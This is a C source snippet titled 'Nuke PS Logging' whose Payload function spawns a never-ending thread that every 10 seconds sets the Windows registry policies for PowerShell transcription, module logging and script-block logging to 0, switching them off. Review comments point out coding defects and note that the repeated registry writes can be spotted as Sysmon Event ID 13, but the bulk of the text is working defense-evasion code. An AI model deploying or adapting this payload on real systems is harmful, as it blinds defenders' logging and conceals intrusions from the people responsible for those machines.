Nuke PS Logging
// Payload: spawns MyThreadFunction on a new thread and returns at once; the
// thread keeps running on its own after this function has returned.
//
// Review notes:
//  - MyThreadFunction is defined further down this file with no prototype
//    above this point; standards-conforming C needs a forward declaration
//    (`DWORD WINAPI MyThreadFunction(LPVOID);`) before this call.
//  - The HANDLE returned by CreateThread is discarded, so the caller can
//    neither wait on nor close the thread, and a NULL (failed) return goes
//    unnoticed. threadId is written but never read.
//  - MyThreadFunction loops forever (see its body), so the thread created
//    here never terminates on its own.
void Payload() {
    DWORD threadId;
    CreateThread(
        NULL, // default security attributes
        0, // use default stack size
        MyThreadFunction, // thread function name
        NULL, // argument to thread function
        0, // use default creation flags
        &threadId);
}
// MyThreadFunction: thread body. Every 10 seconds it opens three PowerShell
// policy keys under HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell
// (Transcription, ModuleLogging, ScriptBlockLogging) and writes REG_DWORD 0 to
// EnableTranscripting, EnableModuleLogging and EnableScriptBlockLogging, i.e.
// it repeatedly switches those logging policies off. lpParam is unused.
// Never returns.
//
// Review notes (defects visible in this block):
//  - No RegOpenKeyEx success is ever paired with RegCloseKey, so up to three
//    HKEY handles leak per iteration, indefinitely.
//  - The third RegOpenKeyEx argument is ulOptions (a DWORD); NULL is passed
//    where 0 is meant. Likewise NULL is passed for RegSetValueEx's Reserved
//    DWORD parameter.
//  - RegOpenKeyEx and OutputDebugString receive narrow literals while
//    RegSetValueEx receives TEXT(); under a UNICODE build the value name
//    would be wide and the key path narrow — TODO confirm intended charset.
//  - RegOpenKeyEx does not create missing keys; a key that is absent only
//    produces the printf message, and printf has nowhere to go in a process
//    without a console.
//  - KEY_ALL_ACCESS on HKLM needs administrative rights; a lower-privilege
//    caller gets an open failure every 10 s.
//  - The "Failed to add key" debug text is misleading: RegSetValueEx sets a
//    value, it does not add a key.
//
// Detection note: each iteration produces a registry value-set event on these
// well-known policy values (e.g. Sysmon Event ID 13), repeated every 10 s —
// a strong signal of tampering with PowerShell logging.
DWORD WINAPI MyThreadFunction(LPVOID lpParam) {
    HKEY hKey;
    LPCSTR sKeyPath;
    int iResult; // holds a LONG status code from the Reg* calls
    DWORD value = 0x00000000; // the value written to every policy: logging off
    while (TRUE) {
        sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription";
        // KEY_WOW64_64KEY selects the 64-bit registry view even from a 32-bit process.
        iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
        if (iResult == ERROR_SUCCESS) {
            if (ERROR_SUCCESS != RegSetValueEx(hKey,
                TEXT("EnableTranscripting"),
                NULL,
                REG_DWORD,
                (const BYTE*)&value, // Change made here.
                sizeof(value))) {
                OutputDebugString("Failed to add key");
            }
            // hKey is not closed here (handle leak).
        }
        else {
            printf("Could not open key: %d", iResult);
        }
        sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging";
        iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
        if (iResult == ERROR_SUCCESS) {
            if (ERROR_SUCCESS != RegSetValueEx(hKey,
                TEXT("EnableModuleLogging"),
                NULL,
                REG_DWORD,
                (const BYTE*)&value, // Change made here.
                sizeof(value))) {
                OutputDebugString("Failed to add key");
            }
            // hKey is not closed here (handle leak).
        }
        else {
            printf("Could not open key: %d", iResult);
        }
        sKeyPath = "SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging";
        iResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, sKeyPath, NULL, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
        if (iResult == ERROR_SUCCESS) {
            if (ERROR_SUCCESS != RegSetValueEx(hKey,
                TEXT("EnableScriptBlockLogging"),
                NULL,
                REG_DWORD,
                (const BYTE*)&value, // Change made here.
                sizeof(value))) {
                OutputDebugString("Failed to add key");
            }
            // hKey is not closed here (handle leak).
        }
        else {
            printf("Could not open key: %d", iResult);
        }
        Sleep(10000); // 10 s between passes; the loop has no exit condition
    }
}